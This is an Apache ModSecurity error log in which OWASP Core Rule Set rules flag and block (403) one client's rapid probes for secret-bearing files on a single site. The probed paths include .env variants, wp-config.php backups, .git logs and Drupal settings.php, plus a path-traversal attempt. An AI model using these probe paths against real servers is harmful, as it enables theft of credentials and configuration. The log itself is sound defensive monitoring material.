[Tue May 12 01:27:44.331949 2026] [security2:error] [pid 1707624:tid 1707694] [client 45.148.10.246:15484] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "of-crystal-lake.net"] [uri "/api/.env"] [unique_id "agJl8LOxS7i6i_mT2NKxugAAAEw"]
[Tue May 12 01:27:44.331985 2026] [security2:error] [pid 1630927:tid 1630933] [client 45.148.10.246:15552] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "of-crystal-lake.net"] [uri "/backend/.env"] [unique_id "agJl8GiGYYhUwDaJINnO8AAAAUM"]
[Tue May 12 01:27:44.332028 2026] [security2:error] [pid 1695975:tid 1695997] [client 45.148.10.246:15612] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "of-crystal-lake.net"] [uri "/wp-config.php"] [unique_id "agJl8NVI9ymHBxup7492jwAAAJM"]
[Tue May 12 01:27:44.332056 2026] [security2:error] [pid 1695975:tid 1695982] [client 45.148.10.246:15602] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php.bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "of-crystal-lake.net"] [uri "/wp-config.php.bak"] [unique_id "agJl8NVI9ymHBxup7492kQAAAIQ"]
[Tue May 12 01:27:44.332067 2026] [security2:error] [pid 1707624:tid 1707699] [client 45.148.10.246:15640] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "of-crystal-lake.net"] [uri "/.env~"] [unique_id "agJl8LOxS7i6i_mT2NKxuwAAAFE"]
[Tue May 12 01:27:44.332066 2026] [security2:error] [pid 1707624:tid 1707687] [client 45.148.10.246:15518] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "of-crystal-lake.net"] [uri "/.env.backup"] [unique_id "agJl8LOxS7i6i_mT2NKxvAAAAEU"]
[Tue May 12 01:27:44.332080 2026] [security2:error] [pid 1707624:tid 1707694] [client 45.148.10.246:15484] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "of-crystal-lake.net"] [uri "/api/.env"] [unique_id "agJl8LOxS7i6i_mT2NKxugAAAEw"]
[Tue May 12 01:27:44.332103 2026] [security2:error] [pid 1630927:tid 1630934] [client 45.148.10.246:15626] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php~"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "of-crystal-lake.net"] [uri "/wp-config.php~"] [unique_id "agJl8GiGYYhUwDaJINnO8gAAAUQ"]
[Tue May 12 01:27:44.332177 2026] [security2:error] [pid 1695975:tid 1695982] [client 45.148.10.246:15602] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "of-crystal-lake.net"] [uri "/wp-config.php.bak"] [unique_id "agJl8NVI9ymHBxup7492kQAAAIQ"]
[Tue May 12 01:27:44.332195 2026] [security2:error] [pid 1695975:tid 1695997] [client 45.148.10.246:15612] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "of-crystal-lake.net"] [uri "/wp-config.php"] [unique_id "agJl8NVI9ymHBxup7492jwAAAJM"]
[Tue May 12 01:27:44.332231 2026] [security2:error] [pid 1630927:tid 1630934] [client 45.148.10.246:15626] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "of-crystal-lake.net"] [uri "/wp-config.php~"] [unique_id "agJl8GiGYYhUwDaJINnO8gAAAUQ"]
[Tue May 12 01:27:44.332263 2026] [security2:error] [pid 1707624:tid 1707687] [client 45.148.10.246:15518] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "of-crystal-lake.net"] [uri "/.env.backup"] [unique_id "agJl8LOxS7i6i_mT2NKxvAAAAEU"]
[Tue May 12 01:27:44.332315 2026] [security2:error] [pid 1707624:tid 1707694] [client 45.148.10.246:15484] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "of-crystal-lake.net"] [uri "/api/.env"] [unique_id "agJl8LOxS7i6i_mT2NKxugAAAEw"]
[Tue May 12 01:27:44.332382 2026] [security2:error] [pid 1695975:tid 1695982] [client 45.148.10.246:15602] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "of-crystal-lake.net"] [uri "/wp-config.php.bak"] [unique_id "agJl8NVI9ymHBxup7492kQAAAIQ"]
[Tue May 12 01:27:44.332484 2026] [security2:error] [pid 1630927:tid 1630934] [client 45.148.10.246:15626] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "of-crystal-lake.net"] [uri "/wp-config.php~"] [unique_id "agJl8GiGYYhUwDaJINnO8gAAAUQ"]
[Tue May 12 01:27:44.332508 2026] [security2:error] [pid 1695975:tid 1695997] [client 45.148.10.246:15612] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "of-crystal-lake.net"] [uri "/wp-config.php"] [unique_id "agJl8NVI9ymHBxup7492jwAAAJM"]
[Tue May 12 01:27:44.332666 2026] [security2:error] [pid 1707624:tid 1707687] [client 45.148.10.246:15518] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "of-crystal-lake.net"] [uri "/.env.backup"] [unique_id "agJl8LOxS7i6i_mT2NKxvAAAAEU"]
[Tue May 12 01:27:44.332776 2026] [security2:error] [pid 1707624:tid 1707699] [client 45.148.10.246:15640] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "of-crystal-lake.net"] [uri "/.env~"] [unique_id "agJl8LOxS7i6i_mT2NKxuwAAAFE"]
[Tue May 12 01:27:44.337300 2026] [security2:error] [pid 1709071:tid 1709108] [client 45.148.10.246:15546] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/logs/head"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "of-crystal-lake.net"] [uri "/.git/logs/HEAD"] [unique_id "agJl8LvMumyrWMfSu7qSOgAAANU"]
[Tue May 12 01:27:44.337314 2026] [security2:error] [pid 1709071:tid 1709096] [client 45.148.10.246:15582] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /local/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "of-crystal-lake.net"] [uri "/local/.env"] [unique_id "agJl8LvMumyrWMfSu7qSOAAAAMk"]
[Tue May 12 01:27:44.337439 2026] [security2:error] [pid 1709071:tid 1709108] [client 45.148.10.246:15546] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "of-crystal-lake.net"] [uri "/.git/logs/HEAD"] [unique_id "agJl8LvMumyrWMfSu7qSOgAAANU"]
[Tue May 12 01:27:44.337445 2026] [security2:error] [pid 1709071:tid 1709096] [client 45.148.10.246:15582] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "of-crystal-lake.net"] [uri "/local/.env"] [unique_id "agJl8LvMumyrWMfSu7qSOAAAAMk"]
[Tue May 12 01:27:44.337645 2026] [security2:error] [pid 1709071:tid 1709096] [client 45.148.10.246:15582] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "of-crystal-lake.net"] [uri "/local/.env"] [unique_id "agJl8LvMumyrWMfSu7qSOAAAAMk"]
[Tue May 12 01:27:44.337658 2026] [security2:error] [pid 1709071:tid 1709108] [client 45.148.10.246:15546] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "of-crystal-lake.net"] [uri "/.git/logs/HEAD"] [unique_id "agJl8LvMumyrWMfSu7qSOgAAANU"]
[Tue May 12 01:27:44.346073 2026] [core:error] [pid 1630927:tid 1630933] [client 45.148.10.246:15552] AH10244: invalid URI path (/storage/../../../.env)
[Tue May 12 01:27:44.346622 2026] [security2:error] [pid 1695975:tid 1695987] [client 45.148.10.246:15472] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "of-crystal-lake.net"] [uri "/.env"] [unique_id "agJl8NVI9ymHBxup7492kgAAAIk"]
[Tue May 12 01:27:44.346736 2026] [security2:error] [pid 1695975:tid 1695987] [client 45.148.10.246:15472] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "of-crystal-lake.net"] [uri "/.env"] [unique_id "agJl8NVI9ymHBxup7492kgAAAIk"]
[Tue May 12 01:27:44.346931 2026] [security2:error] [pid 1695975:tid 1695987] [client 45.148.10.246:15472] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "of-crystal-lake.net"] [uri "/.env"] [unique_id "agJl8NVI9ymHBxup7492kgAAAIk"]
[Tue May 12 01:27:44.348925 2026] [security2:error] [pid 1707624:tid 1707694] [client 45.148.10.246:15484] ModSecurity: Warning. Matched phrase "/.gitignore" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.gitignore found within REQUEST_FILENAME: /.gitignore"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "of-crystal-lake.net"] [uri "/.gitignore"] [unique_id "agJl8LOxS7i6i_mT2NKxvwAAAEw"]
[Tue May 12 01:27:44.349036 2026] [security2:error] [pid 1707624:tid 1707694] [client 45.148.10.246:15484] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "of-crystal-lake.net"] [uri "/.gitignore"] [unique_id "agJl8LOxS7i6i_mT2NKxvwAAAEw"]
[Tue May 12 01:27:44.349220 2026] [security2:error] [pid 1707624:tid 1707694] [client 45.148.10.246:15484] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "of-crystal-lake.net"] [uri "/.gitignore"] [unique_id "agJl8LOxS7i6i_mT2NKxvwAAAEw"]
[Tue May 12 01:27:44.349806 2026] [security2:error] [pid 1695975:tid 1695981] [client 45.148.10.246:15624] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "of-crystal-lake.net"] [uri "/.ENV"] [unique_id "agJl8NVI9ymHBxup7492kwAAAIM"]
[Tue May 12 01:27:44.349974 2026] [security2:error] [pid 1695975:tid 1695981] [client 45.148.10.246:15624] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "of-crystal-lake.net"] [uri "/.ENV"] [unique_id "agJl8NVI9ymHBxup7492kwAAAIM"]
[Tue May 12 01:27:44.350178 2026] [security2:error] [pid 1691274:tid 1691299] [client 45.148.10.246:15636] ModSecurity: Warning. Matched phrase "/sites/default/settings.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /sites/default/settings.php found within REQUEST_FILENAME: /sites/default/settings.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "of-crystal-lake.net"] [uri "/sites/default/settings.php"] [unique_id "agJl8FfdQaraX_prmqcICwAAABg"]
[Tue May 12 01:27:44.350233 2026] [security2:error] [pid 1695975:tid 1695981] [client 45.148.10.246:15624] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "of-crystal-lake.net"] [uri "/.ENV"] [unique_id "agJl8NVI9ymHBxup7492kwAAAIM"]
[Tue May 12 01:27:44.350326 2026] [security2:error] [pid 1630927:tid 1630934] [client 45.148.10.246:15626] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "of-crystal-lake.net"] [uri "/.env.local"] [unique_id "agJl8GiGYYhUwDaJINnO9QAAAUQ"]
[Tue May 12 01:27:44.350357 2026] [security2:error] [pid 1691274:tid 1691299] [client 45.148.10.246:15636] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "of-crystal-lake.net"] [uri "/sites/default/settings.php"] [unique_id "agJl8FfdQaraX_prmqcICwAAABg"]
[Tue May 12 01:27:44.350440 2026] [security2:error] [pid 1630927:tid 1630934] [client 45.148.10.246:15626] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "of-crystal-lake.net"] [uri "/.env.local"] [unique_id "agJl8GiGYYhUwDaJINnO9QAAAUQ"]
[Tue May 12 01:27:44.350608 2026] [security2:error] [pid 1691274:tid 1691299] [client 45.148.10.246:15636] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "of-crystal-lake.net"] [uri "/sites/default/settings.php"] [unique_id "agJl8FfdQaraX_prmqcICwAAABg"]
[Tue May 12 01:27:44.350626 2026] [security2:error] [pid 1630927:tid 1630934] [client 45.148.10.246:15626] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "of-crystal-lake.net"] [uri "/.env.local"] [unique_id "agJl8GiGYYhUwDaJINnO9QAAAUQ"]
